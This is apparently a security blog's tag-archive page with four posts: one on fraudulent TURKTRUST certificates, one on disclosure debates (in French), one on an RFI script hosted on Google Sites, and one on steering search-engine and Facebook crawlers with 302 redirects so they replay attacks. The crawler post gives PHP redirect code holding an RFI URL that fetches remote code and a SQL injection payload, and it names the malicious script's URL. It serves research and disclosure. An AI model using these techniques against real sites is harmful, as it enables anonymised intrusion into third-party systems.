Tag Archives: Google

Fraudulent TURKTRUST Digital Certificat Used In Active Attacks

GoogleMicrosoft and Mozilla have release alerts regarding active attacks using fraudulent digital certificates issued by TURKTRUST, a Turkish certificate authority and a subsidiary company of Turkish Armed Forces ELELE Foundation Company.

Google alert precise that on 24 December they detected and blocked an unauthorized digital certificate for the “*.google.com” domain. This certificat was issued by an intermediate certificate authority (CA) linked to TURKTRUST. After investigation, in collaboration with TURKTRUST, it appears that an additional intermediate certificate authority was also compromised. Google Chrome certificate revocation list has been updated the 26 December to block these fraudulent intermediate CA.

Microsoft has release an Security Advisory MSA-2798897, who affects all supported releases of Microsoft Windows. Microsoft is updating the Certificate Trust list and provide an update for all supported releases of Microsoft Windows that removes these fraudulent certificates. Systems using Windows 8, Windows RT, Windows Server 2012, and devices running Windows Phone 8 are automatically updated and protected.

The following certificates will be added to the Untrusted Certificates folder:

  • Certificate “*.google.com” issued by “*.EGO.GOV.TR” with thumbprint “4d 85 47 b7 f8 64 13 2a 7f 62 d9 b7 5b 06 85 21 f1 0b 68 e3“.
  • Certificate “e-islem.kktcmerkezbankasi.org” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “f9 2b e5 26 6c c0 5d b2 dc 0d c3 f2 dc 74 e0 2d ef d9 49 cb“.
  • Certificate “*.EGO.GOV.TR” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “c6 9f 28 c8 25 13 9e 65 a6 46 c4 34 ac a5 a1 d2 00 29 5d b1“.

Mozilla has release a Security Blog Post and take a different position than Google or Microsoft. The foundation will actively revoke trust for the two fraudulent certificates, but also suspend inclusion of the “TÜRKTRUST Bilgi ?leti?im ve Bili?im Güvenli?i Hizmetleri A.?. (c) Aral?k 2007” root certificate, pending further review. A new release of Firefox will be released on Tuesday 8th January.

These fraudulent certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks, so we advise you to update asap.

Bots Command & Conquer

Some months ago, I was interested by suspicious alerts, generated on our Honey Net, how are related to the dedicated Google AdSense “Mediapartners-Google*” bot.
Mediapartners bot, as I understand, is working with the Google cache, so, when a new web page, or an existing web page, using the AdSense javascript code, is called by a visitor, and is no not contained in the Google cache, the Mediapartners bot will fetch the web page.

If the web page how has been invoked, first by the visitor, contain SQL injection, RFI, LFI or XSS URL parameters, Mediapartners bot will replay the attack. So if you are vulnerable to theses web attacks, you will get owned first by the visitor how has invoke the vulnerable URL, then by Mediapartners bot how will copycat the visitor action. I tested with SQL injections and RFI vulnerabilities, my lab was all the time owned, in a second time, by the Mediapartners bot.

This bot behavior, is interesting, cause you could need a web attack how require two sequences, the first sequence will be made by the visitor call, then the second action by the bot. For example, on a RFI vulnerability (http://www.example.com/test.php?id=http://www.proxy.com/id.txt), the visitor first call, will execute the “id.txt” code, and directly after the code execution the original id.txt code could be automatically replaced by a different code, how will be then called by the Mediapartners copycat bot.

Mediapartners bot is not a “classical” search engine bot. “Classical” search engine bot will visit your website depending the popularity of your website, and surely others criteria, so you don’t have any control on when they will come visit you. In 2001, lcamtuf (aka Michal Zalewski) has publish a Phrack “Rise of the Robots” article how demonstrate that classical search engine, with them natural “link follow” behavior, could also participate to hack vulnerable websites. Just create a web page with thousands of SQL injections, or RFI, web links, the search engine bot will follow the links and execute the web attacks. This technique is known as “link spam“. But as described by lcamtuf you don’t have the control on the bot visit timeline.

With the Mediapartners bot, we have the control on the timing, cause you know the triggers how are calling the bot. You need to have a valid AdSense account, the AdSense javascript in your web page, and the web page shouldn’t not be in the Google cache. Quiet easy to on demand invoke the bot, create random web pages, with all the pre-requirements and the job will be done. Bot invocation on demand.

But you still have a trouble, you have to reveal your source IP, by the first web page invocation, the attack is not transparent.

“Classical” search engine bots have interesting features, for example the could react the 301 or 302 HTTP redirection. So you could redirect, certain bots, where you want. Just take a look at the following code, and replace “Bots“, with a bot fingerprint :

$br = get_browser($_REQUEST['HTTP_USER_AGENT'], true);
$a = $br['browser'];

#$URL = "http://www.xxxxx.com/index.php?option=http://www.yyyy.com/id.txt??";
#$URL = "http://www.xxxxx.com/inject-me.php?id='%20OR%20'a'='a";
$URL = "http://www.xxxxxx.com/";

if(preg_match('/Bots/i',$a)) {
      header("Location: $URL");

I have test the 302 redirection with the most common search engine bots, and have see that most of them are “vulnerable”.

  • msnbot-media

C&C server – – [14/Jan/2011:21:56:38 +0100] “GET /random_url.php HTTP/1.1” 302 236957 “-” “msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)”

Target server – – [14/Jan/2011:21:56:40 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)” – – [14/Jan/2011:21:56:41 +0100] “GET / HTTP/1.1” 200 15146 “-” “msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)”

  • bingbot

C&C server – – [14/Jan/2011:22:34:49 +0100] “GET /random_url.php HTTP/1.1” 302 19847 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)”

Target server – – [14/Jan/2011:22:34:50 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)” – – [14/Jan/2011:22:34:51 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)”

  • Yahoo! Slurp – – [16/Jan/2011:09:08:55 +0100] “GET /random_url.php HTTP/1.0” 302 – “-” “Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)”

  • Googlebot-Image – – [14/Jan/2011:22:09:02 +0100] “GET /random_url.php HTTP/1.1” 302 71861 “-” “Googlebot-Image/1.0”

All the time, the bots have execute the web attacks, and they was the only source IP of the attack, they’re is no need to directly to reveal yourself for web hacking, the search engine bots will do the job for you. But as I explained, you don’t have any control on the bot invocation.

After some searches I discovered that Mediapartners bot is also vulnerable to the 302 redirection. So you know how to call the bot, and you have control on him by redirecting him where you want.

Some random text
<script type="text/javascript"><!--
google_ad_client = "pub-xxxxxxxxxxxxxxxxx";
google_ad_slot = "1169124694";
google_ad_width = 300;
google_ad_height = 250;
<script type="text/javascript"
$br = get_browser($_REQUEST['HTTP_USER_AGENT'], true);
$a = $br['browser'];
#$URL = "http://www.xxxxx.com/index.php?option=http://www.yyyy.com/id.txt??";
#$URL = "http://www.xxxxx.com/inject-me.php?id='%20OR%20'a'='a";
$URL = "http://www.yyyy.com";
if(preg_match('/Mediapartners/i',$a)) {
      header("Location: $URL");

Here under the result. I still have to first invoke the bot, but then the bot will be redirected to the target URL, hiding my source IP.

C&C server – – [13/Jan/2011:00:27:40 +0100] “GET /random_URL.php HTTP/1.1” 200 1290 “-” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.231 Safari/534.10” – – [13/Jan/2011:00:27:42 +0100] “GET /random_URL.php HTTP/1.1” 302 1288 “-” “Mediapartners-Google”

Target server – – [13/Jan/2011:00:27:42 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mediapartners-Google”

What is interesting to see is that the Mediapartners bot source IP on the C&C server is not the same than the source IP on the target server. The Mediapartners bots are sharing orders between different source servers.

I have now a fully controllable bot, time and target are customizable. It is quiet simple to create a C&C back-end how will generate random on demand web pages, and do the invocation of the bot. After more tests Mediapartners bot is not only supporting HTTP or HTTPS protocol, but also FTP. – – [15/Jan/2011:00:19:26 +0100] “GET /random_URL.php HTTP/1.1” 302 91754 “-” “Mediapartners-Google”

root@xxxxx ~]# tcpdump -n port 21
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

00:19:27.956865 IP > xxx.xxx.xxx.xxx.ftp: S 1218834134:1218834134(0) win 5840
00:19:27.956983 IP xxx.xxx.xxx.xxx.ftp > S 2218131910:2218131910(0) ack 1218834135 win 5792
00:19:27.972538 IP > xxx.xxx.xxx.xxx.ftp: . ack 1 win 92
00:19:27.973972 IP xxx.xxx.xxx.xxx.ftp > P 1:266(265) ack 1 win 91
00:19:27.989653 IP > xxx.xxx.xxx.xxx.ftp: . ack 266 win 108
00:19:27.989864 IP > xxx.xxx.xxx.xxx.ftp: P 1:17(16) ack 266 win 108
00:19:27.989894 IP xxx.xxx.xxx.xxx.ftp > . ack 17 win 91
00:19:27.990238 IP xxx.xxx.xxx.xxx.ftp > F 266:266(0) ack 17 win 91
00:19:28.005937 IP > xxx.xxx.xxx.xxx.ftp: F 17:17(0) ack 267 win 108
00:19:28.005975 IP xxx.xxx.xxx.xxx.ftp > . ack 18 win 91

Is Mediapartners bot the only bot how is fully controllable ? No 🙂 Another example is the Facebook “facebookexternalhit” bot. Here under the description of the bot :

“Facebook allows its users to send links to interesting web content to other Facebook users. Part of how this works on the Facebook system involves the temporary display of certain images or details related to the web content, such as the title of the webpage or the embed tag of a video. Our system retrieves this information only after a user provides us with a link.”

When you publish an URL on your Facebook wall status, “facebookexternalhit” bot will fetch the URL and cache the content for later delivery. So, you have control on the bot invocation. Facebook has some security mechanisms how don’t permit you to publish a link on your wall containing SQL injection, RFI, LFI or XSS in parameters.

But “facebookexternalhit” bot is also vulnerable to 302 redirection, so permitting you to trick the security mechanism.

C&C server – – [14/Jan/2011:22:40:57 +0100] “GET /random_URL.php HTTP/1.1” 302 65629 “-” “facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)”

Target server – – [14/Jan/2011:22:40:58 +0100] “GET / HTTP/1.1” 200 9545 “-” “facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)”

Just publish a “normal” link on you Facebook status, the bot will fetch the page and will be directly redirected, for example, on a SQL injection URL. What is funny, is that the result of the web attack will be displayed on your wall 🙂

Result of a 302 SQL injection in the title HTML tag
Result of a LFI web attack on a targeted server after 302 redirection

A lot of bots are vulnerable to different attack, you never see them, but take care of them. I would like to thanks jduck from Metasploit Team, providing me some useful informations.

Responsible Disclosure vs Coordinated Vulnerability Disclosure, le débat sans fin

Le 10 Juin dernier, Tavis Ormandy, chercheur membre de l’équipe de sécurité de Google, avait publié une vulnérabilité nommée “Microsoft Windows Help Centre” qui avait fait beaucoup de bruit sur Internet et au sein de la communauté de la sécurité informatique. Le débat sur le “divulgation responsable des vulnérabilités” contre la “divulgation totale des vulnérabilités” refaisait surface.

Il faut dire que Taviso avait soumis la vulnérabilité à Microsoft 4 jours avant de publier celle-ci sur Internet, laissant ainsi très peu de temps à Microsoft pour réagir et fournir aux utilisateurs finaux une méthode de protection contre cette vulnérabilité. Dans son bulletin, Taviso précisait que la recherche effectuée sur cette vulnérabilité avait été faîte sur son temps personnel et qu’en aucun cas Google ne pouvait être associé à cette divulgation. L’on pouvait tous de même retrouver à la fin de ce bulletin des remerciements à destination d’autres membres de l’équipe de sécurité de Google.

Dans ce même bulletin, Taviso encourageait les internautes à prendre contact avec Microsoft afin de faire pression pour avoir des délais de réaction plus court aux bulletins émis par les chercheurs en sécurité informatique. La position de Taviso est claire, les fournisseurs de logiciels, tels que Microsoft, ne doivent pas tarder, après notification d’une vulnérabilité, à réagir pour mettre à disposition des mises à jour de sécurité. Si un chercheur en sécurité informatique a pu trouver cette vulnérabilité, une personne mal intentionnée pourrait l’avoir aussi découverte. La sécurité des entreprises et des internautes est en question.

Quand à Microsoft, sa position était tous aussi claire, qui de mieux que le fournisseur peut trouver la cause primaire de la vulnérabilité et ainsi fournir la meilleure correction à celle-ci. Taviso aurait fourni, suivant Microsoft, une analyse incomplète de la vulnérabilité, ainsi qu’une solution de mitigation trop facilement contournable. Microsoft ne revient pas sur le fait que les chercheurs en sécurité informatique sont indispensables, mais préconise, tous comme Google, une divulgation responsable des vulnérabilités. De dévoiler, sans correctif disponible, une vulnérabilité peut mettre la sécurité des entreprises et des internautes en péril.

Le dilemme est là, la sécurité par l’obscurité ainsi que la sécurité par la divulgation, quel soit responsable ou non, peut mettre en péril la sécurité des entreprises et des internautes.

Il y a tous de même un fait à ne pas oublier, quelques mois auparavant Google avait été la cible d’une attaque ciblée et persistante (Opération Aurora). Cette attaque avait exploité un 0day dans Internet Explorer 6, et permis à des personnes mal intentionnées de dérober des données sensibles de Google. De plus, ne pas oublier que Google et Microsoft sont concurrents sur bien des secteurs, navigateurs internet, OS, SaaS, etc.

Ce Mardi 20 Juillet, la polémique sur la divulgation des vulnérabilités a franchit une nouvelle étape. Dans un billet signé de façon commune par Tavis Ormandy et d’autres membres de l’équipe de sécurité de Google, propose de réduire les délais d’attente à 60 jours entre le moment où le fournisseur est mis au courant d’une vulnérabilité critique, et le moment où la même vulnérabilité critique serait rendue publique. Google invite les autres chercheurs en sécurité informatique à suivre la même police de divulgation afin de mettre “la pression” sur les fournisseurs de logiciels vulnérables.

En contre attaque, ce Jeudi 22 Juillet, Microsoft a annoncé un changement de son approche au niveau de la divulgation des vulnérabilités. Jusqu’à maintenant Microsoft était aussi un adepte de la méthode “Responsible Disclosure”, mais depuis cette annonce la nouvelle méthode qui sera appliquée se nommera “Coordinated Vulnerability Disclosure “. Uniquement une question de sémantique ?

Afin de “mettre un terme” au débat sans fin (que Microsoft alimente par cette annonce), Microsoft insiste sur le fait que coordination et collaboration sont requises pour résoudre les problèmes afin de réduire les risques pour les internautes. Microsoft insiste sur le fait que la divulgation d’une vulnérabilité est une responsabilité qui doit être partagée entre les différents acteurs de la découverte (Chercheur), de la centralisation (CERT, Secunia), du traitement et de la résolution de celle-ci (Fournisseur). Cette responsabilité partagée se base sur une collaboration plus forte entre le fournisseur et le chercheur.

En tous cas, la guerre de la communication et le débat sur la divulgation des vulnérabilités ne risque pas de s’arrêter. La guerre commerciale entre Google et Microsoft ne fait que commencer.

Remote File Inclusion in Google Cloud – nurhayati satu

Every know the Cloud security problematic, and the associated issues how are more and more visible. In July 2008 Outblaze and Spamhaus blocked Amazon EC2 Public IP ranges due to distribution of spam and malware. In April 2009 Arbor Networks reported that a malicious Google AppEngine was used as botnet CnC. In April 2010, VoIP Tech Chat has reported some Amazon EC2 SIP brute force attacks, until abuse report to Amazon EC2 the attacks have still continue in May, etc.

In March 2009, our Honey Net reported us a malicious Remote File Inclusion code hosted on a Google Sites, how was invoked in few events. The Google Sites was called “nurhayati satu“, an Indonesian surname and first name. The invoked malicious script was “http://sites.google.com/site/nurhayatisatu/1.txt???“.


Between March 2009 and May 2010, no more sign of life of this Google Sites. But since May the number of events have increase and we could distinguish the apparition of the “Cloud” phenomena. “nurhayati satu” Google Sites has now around 16 IP addresses associated as hosting server and all these IP addresses are owned by Google Inc. The involved CIDR’s are and

It is interesting to visualize the interactions of the attackers source IPs (in blue) with the Google Sites Cloud destination IPs (in green).

Google Sites Cloud RFI
Google Sites Cloud RFI

You can see that the attackers source IPs are not dedicated to one hosting server IP, but are also invoking the “Cloud” IPs.

Between the search engine of the “nurhayati satu” Google Sites you can find other hosted classical scripts, scanners, tcl, etc.

Every one of you know the Google results labelled ‘This site may harm your computer‘.

It will be funny if Google Sites themselves will be labelled, but more seriously should we declare Google Sites to Dshield, Abuse.ch or Emerging Threats ? Should we block Google, cause Google is delivering some malwares between his Cloud infrastructure, and no one care 🙂